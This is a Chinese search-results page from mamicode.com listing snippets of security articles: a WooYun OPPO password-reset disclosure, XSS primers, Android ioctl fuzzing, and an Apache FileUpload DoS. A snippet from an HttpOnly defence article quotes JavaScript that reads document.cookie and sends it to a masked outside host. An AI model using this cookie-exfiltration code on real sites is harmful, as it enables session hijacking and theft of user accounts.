码迷,mamicode.com
首页 >  
搜索关键字:乌云 漏洞    ( 7215个结果
战斗bug技巧全攻略
程序员不是有一幅这样的对联吗 上联:一个项目两部电脑三餐盒饭只为四千工资搞得五脏俱损六神无主仍然七点起床八点开会处理九个漏洞十分辛苦; 下联:十年编码九年加班八面无光忙的七窍生烟到头六亲不认五体投地依旧四肢酸软三更加班只为二个臭钱一生孤苦; 横批:苦逼程序员。 其实,程序员职业生涯总结起...
分类:其他好文   时间:2014-05-27 01:56:31    阅读次数:225
第二次重置OPPO手机官网任意账户密码(秒改)
漏洞概要 关注数(12) 关注此漏洞 缺陷编号: WooYun-2014-53079漏洞标题: 第二次重置OPPO手机官网任意账户密码(秒改)相关厂商: 广东欧珀移动通讯有限公司 漏洞作者: 魇提交时间: 2014-03-07 23:32公开时间: 2014-04-21 23:33漏洞类型: 设.....
分类:移动开发   时间:2014-05-27 00:42:53    阅读次数:386
利用HttpOnly来防御xss攻击
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。 如下js获取cookie信息:  url=document.top.location.href;  cookie=document.cookie;  c=new Image();  c.src=’http://www.******.c...
分类:其他好文   时间:2014-05-22 08:24:14    阅读次数:273
OAuth 漏洞预警 (OAuth平台redirect_uri 漏洞)
OAuth 漏洞预警 (OAuth平台redirect_uri 漏洞), 说说如何修补...
分类:其他好文   时间:2014-05-21 14:37:04    阅读次数:262
手机App漏洞频出,频现“偷窥门”,到底是何源由??
摘要:因安装不安全的手机App而导致的用户隐私被泄露的事件屡见报端,致使手机App频现“偷窥门”,让越来越多的人为之心惊胆跳。 安卓平台海量的免费应用吸引了越来越多的用户,但其开放性也给用户的隐私安全带来隐患,因安装不安全的手机App导致隐私泄露的事件屡屡被曝光。据统计,5%的免费移动应用都含有侵犯用户隐私的广告软件。这些广告软件可以更改用户手机设置、发送通知消息、私自访问用户身份信息等等。...
分类:移动开发   时间:2014-05-21 14:30:34    阅读次数:280
社会工程学
社会工程学,和心理学属于一系。俗称社工。社工与特工不同,只是出于分析能力较高。知名度较高的,例如凯文米特尼克。社工需要大量的知识。例如,从一张照片可以得到你所在的位置,拍照的季节和时间等等。有人说社工就是欺骗、欺诈,但我不这样认为。社工主要是与计算机有关。一个社工能力较强的人,根本不需要漏洞或者渗透...
分类:其他好文   时间:2014-05-19 19:55:00    阅读次数:221
android ioctl fuzz,android 本地提权漏洞 android root
目前正在研究android 三方设备驱动 fuzzer , 也就是下图所说的 ioctl fuzzing, 下图是由keen team nforest 大神发布;欢迎正在研究此方面的人联系我共同交流进步!Email:Blind Fuzz Smart Fuzzandroid 内核栈溢出android ...
分类:移动开发   时间:2014-05-18 19:49:40    阅读次数:798
谁是面向对象设计中的霸主?(上)
在面向对象的世界里,设计模式从来就没有最好最强的,各个模式从来就谁也不服谁,彼此明争暗斗,未曾善罢甘休。今天,连同简单工厂模式在内的24个设计模式齐聚中原,霎时间,乌云密布,杀气冲天,面向对象的世界里要迎来一场浩劫,血雨腥风,在所难免          在资格赛中,来自工厂家族的简单工厂模式首先被灭掉了,其致命的失误在于简单工厂模式根本不符合开放—封闭原则,因此惨遭灭门也是不足为怪的。然而让人欣...
分类:其他好文   时间:2014-05-18 07:21:54    阅读次数:180
Web安全测试之XSS
Web安全测试之XSSXSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网...
分类:Web程序   时间:2014-05-17 20:20:05    阅读次数:371
重现apache commons fileupload DOS漏洞
这个漏洞是2014年2月4日被发现的, 因为该组件试用范围非常广, 所以该漏洞的影响也非常巨大。通过特制的包含畸形header的http请求,可以导致使用该组件的应用程序进入无线循环从而耗尽CPU等资源并最终崩溃。 最近因为在修补struts1的可操纵classLoader的漏洞(struts2也有该漏洞, 不在本文讨论范围), 所以我就在我建立的struts1的项目上直接做测试。 怎么创建...
分类:其他好文   时间:2014-05-15 20:11:19    阅读次数:240
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!